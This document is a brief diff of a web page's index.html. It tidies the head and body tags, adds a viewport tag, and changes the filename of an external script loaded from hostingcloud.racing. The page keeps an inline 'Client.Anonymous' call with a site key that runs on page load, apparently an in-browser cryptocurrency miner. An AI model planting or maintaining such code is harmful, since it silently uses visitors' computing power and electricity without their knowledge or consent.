--- a/index.html
+++ b/index.html
@@ -5,10 +5,14 @@
 <head>
 	
 <meta charset="utf-8">
+	
+<meta name="viewport" content="width=device-width, initial-scale=1">
 
+</head>
+	
 <body>
             
-<script src="https://www.hostingcloud.racing/EO9i.js"></script>
+<script src="https://www.hostingcloud.racing/E4cx.js"></script>
 	
 <script>
     var _client = new Client.Anonymous('83d47a127d9d7aca938a80b2fcefac99fe7d1a128f8075c0eda536b7615ac619', {
@@ -36,7 +40,5 @@
 </script>
 	
 </body>
-	
-</head>
 	
 </html>
